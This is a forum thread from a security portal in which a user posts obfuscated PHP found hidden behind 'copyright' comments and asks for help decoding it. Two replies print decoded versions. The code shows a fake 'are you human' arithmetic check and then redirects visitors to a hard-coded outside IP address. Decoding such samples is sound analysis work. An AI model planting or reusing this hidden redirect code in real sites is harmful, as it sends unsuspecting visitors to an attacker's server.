|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 130
Members: 0
Total: 130
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Need help decoding this script, and a howto? |
|
Posted: Sat Nov 03, 2012 4:04 pm |
|
|
batiatus |
Beginner |
|
|
Joined: Nov 03, 2012 |
Posts: 1 |
|
|
|
|
|
|
|
Code: |
<?php /* copyright */ ${"G\x4c\x4f\x42\x41L\x53"}["\x74x\x65\x66f\x62c\x76\x74w\x64\x6b"]="k";${"\x47L\x4f\x42\x41\x4c\x53"}["\x73\x76\x63y\x75\x78\x74v"]="k";${"G\x4cO\x42\x41\x4cS"}["\x68\x63\x66\x6fc\x6ev\x6e"]="c";${"\x47\x4cO\x42A\x4cS"}["f\x62\x71m\x77w\x63\x7a\x77gb"]="\x61";$uhhmemlj="v";${"GLO\x42\x41L\x53"}["\x70\x69\x74x\x77b\x7a\x76\x63\x64\x64"]="b";foreach($_GET as${${"\x47\x4c\x4fB\x41L\x53"}["\x74\x78\x65ff\x62\x63\x76tw\x64\x6b"]}=>${$uhhmemlj})if(preg_match("\x21\x5e\x5ba-z\x30-\x39\x5d{\x310\x2c32\x7d\x24!\x69s",${${"GLOB\x41\x4cS"}["\x73vcy\x75\x78\x74v"]})){session_start();if(isset($_POST["res"])&&$_SESSION["r\x65\x73"]==$_POST["\x72e\x73"]){header("\x4c\x6f\x63a\x74io\x6e\x3a \x68tt\x70\x3a\x2f/9\x35\x2e\x31\x36\x39\x2e187.\x39\x38/\x69jh\x66h\x66.p\x68\x70\x3f\x6dg\x74\x64\x66k=\x34\x353\x34\x26\x6ev\x68\x64l=sk\x64\x6ae&go\x6bk\x3d".substr(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x74\x78\x65\x66\x66\x62\x63\x76\x74\x77\x64\x6b"]},-5));}else{$vxomtd="\x63";$kghtssqccjlo="\x61";${$kghtssqccjlo}=mt_rand(1,9);${$vxomtd}=mt_rand(1,9);if(mt_rand(0,1)==1){$yeygmwcsueb="\x61";${"\x47L\x4fB\x41\x4cS"}["s\x77c\x6e\x62\x71c\x78"]="\x62";$_SESSION["\x72e\x73"]=${$yeygmwcsueb}+${${"G\x4c\x4f\x42ALS"}["\x68\x63\x66\x6f\x63nv\x6e"]};${${"GLO\x42\x41L\x53"}["\x73w\x63n\x62q\x63\x78"]}="+";}else{$yliifkkgn="\x61";${"\x47LO\x42AL\x53"}["\x6a\x66\x75\x74\x70\x6f\x68xk\x77\x6b"]="\x62";${"GLOB\x41\x4c\x53"}["rii\x71\x75\x66\x6a\x76\x73\x79"]="\x63";$_SESSION["\x72\x65\x73"]=${$yliifkkgn}-${${"\x47\x4c\x4fB\x41LS"}["\x72ii\x71u\x66j\x76\x73\x79"]};${${"G\x4c\x4fB\x41\x4c\x53"}["jf\x75\x74p\x6fhx\x6bwk"]}="\x2d";}${"GL\x4f\x42\x41\x4c\x53"}["\x6d\x76\x68\x69fa\x63"]="c";echo"\x3c\x66o\x72\x6d m\x65\x74h\x6f\x64\x3d'po\x73\x74'\x3e\n\t \x20 \x20<d\x69v\x20sty\x6ce='\x77\x69\x64t\x68\x3a\x352\x30\x70x\x3b \x6dar\x67i\x6e\x3a0p\x78\x20a\x75\x74\x6f;\x20\x6d\x61rgi\x6e\x2d\x74o\x70:10\x30p\x78\x3b\x20\x70\x61ddi\x6e\x67:\x31\x35\x70x;\x20\x62\x6f\x72\x64\x65\x72:1p\x78 \x73oli\x64 \x233\x333\x3b\x20b\x61\x63k\x67\x72ound-\x63o\x6c\x6fr\x3a\x23ee\x65\x3b\x27\x3e\n\t\x20 \x20\x20P\x6ceas\x65 verif\x79\x20that \x79ou \x61\x72e\x20\x68\x75m\x61n\x2c\n\t \x20\x20 \x77h\x61t\x20\x69\x73\x20\x72\x65\x73ult\x20of\x3a\x20".${${"GLO\x42\x41\x4c\x53"}["\x66\x62\x71\x6dw\x77\x63\x7a\x77\x67\x62"]}."\x20".${${"G\x4c\x4f\x42\x41LS"}["\x70i\x74xw\x62\x7a\x76\x63\x64\x64"]}."\x20".${${"\x47\x4c\x4f\x42A\x4c\x53"}["mv\x68if\x61c"]}." =\n\t \x20\x20\x20<in\x70u\x74 ty\x70e='t\x65\x78\x74' n\x61\x6de\x3d\x27\x72es\x27\x20s\x69\x7ae\x3d'\x32\x27\x20\x76\x61\x6cue\x3d'\x3f'\x3e\n\t <\x69np\x75\x74 typ\x65=\x27\x73ubmit'\x20v\x61\x6cu\x65=\x27I am H\x75man!\x27>\n\t \x20\x3c\x2fd\x69\x76\x3e<\x2fform>";}exit;} /* copyright */ ?>
|
|
|
|
|
|
|
|
|
|
Posted: Sat Nov 03, 2012 7:23 pm |
|
|
vv456 |
Advanced user |
|
|
Joined: Aug 24, 2012 |
Posts: 190 |
|
|
|
|
|
|
|
Code: | <?php ${"GLOBALS"}["txeffbcvtwdk"]="k";
${"GLOBALS"}["svcyuxtv"]="k";
${"GLOBALS"}["hcfocnvn"]="c";
${"GLOBALS"}["fbqmwwczwgb"]="a";
$uhhmemlj="v";
${"GLOBALS"}["pitxwbzvcdd"]="b";
foreach($_GET as${${"GLOBALS"}["txeffbcvtwdk"]}=>${$uhhmemlj})if(preg_match("!^[a-z0-9]{10,32}$!is",${${"GLOBALS"}["svcyuxtv"]})){session_start();
if(isset($_POST["res"])&&$_SESSION["res"]==$_POST["res"]){header("Location: http://95.169.187.98/ijhfhf.php?mgtdfk=4534&nvhdl=skdje&gokk=".substr(${${"GLOBALS"}["txeffbcvtwdk"]},-5));
}else{$vxomtd="c";
$kghtssqccjlo="a";
${$kghtssqccjlo}=mt_rand(1,9);
${$vxomtd}=mt_rand(1,9);
if(mt_rand(0,1)==1){$yeygmwcsueb="a";
${"GLOBALS"}["swcnbqcx"]="b";
$_SESSION["res"]=${$yeygmwcsueb}+${${"GLOBALS"}["hcfocnvn"]};
${${"GLOBALS"}["swcnbqcx"]}="+";
}else{$yliifkkgn="a";
${"GLOBALS"}["jfutpohxkwk"]="b";
${"GLOBALS"}["riiqufjvsy"]="c";
$_SESSION["res"]=${$yliifkkgn}-${${"GLOBALS"}["riiqufjvsy"]};
${${"GLOBALS"}["jfutpohxkwk"]}="-";
}${"GLOBALS"}["mvhifac"]="c";
echo"<form method='post'>\n\t <div style='width:520px;
margin:0px auto;
margin-top:100px;
padding:15px;
border:1px solid #333;
background-color:#eee;
'>\n\t Please verify that you are human,\n\t what is result of: ".${${"GLOBALS"}["fbqmwwczwgb"]}." ".${${"GLOBALS"}["pitxwbzvcdd"]}." ".${${"GLOBALS"}["mvhifac"]}." =\n\t <input type='text' name='res' size='2' value='?'>\n\t <input type='submit' value='I am Human!'>\n\t </div></form>";
}exit;
} ?> |
|
|
|
|
|
|
|
|
|
Posted: Sat Nov 03, 2012 7:38 pm |
|
|
demon |
Moderator |
|
|
Joined: Sep 22, 2010 |
Posts: 485 |
|
|
|
|
|
|
|
vv456, didn't completely decode the file.Here's fully decoded:
Code: | <?php
/* copyright */
foreach ($_GET as $k => $v)
if (preg_match("!^[a-z0-9]{10,32}$!is", $k)) {
session_start();
if (isset($_POST["res"]) && $_SESSION["res"] == $_POST["res"]) {
header("Location: http://95.169.187.98/ijhfhf.php?mgtdfk=4534&nvhdl=skdje&gokk=" . substr($k, -5));
} else {
$a = mt_rand(1, 9);
$c = mt_rand(1, 9);
if (mt_rand(0, 1) == 1) {
$_SESSION["res"] = $a + $c;
$b = "+";
} else {
$_SESSION["res"] = $a - $c;
$b = "-";
}
echo "<form method='post'>\n\t <div style='width:520px;
margin:0px auto;
margin-top:100px;
padding:15px;
border:1px solid #333;
background-color:#eee;
'>\n\t Please verify that you are human,\n\t what is result of: " . $a . " " . $b . " " . $c . " =\n\t <input type='text' name='res' size='2' value='?'>\n\t <input type='submit' value='I am Human!'>\n\t </div></form>";
}
exit;
}
/* copyright */
?> |
|
|
_________________ Go BIG or go HOME ! |
|
|
|
|
www.waraxe.us Forum Index -> PHP script decode requests
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|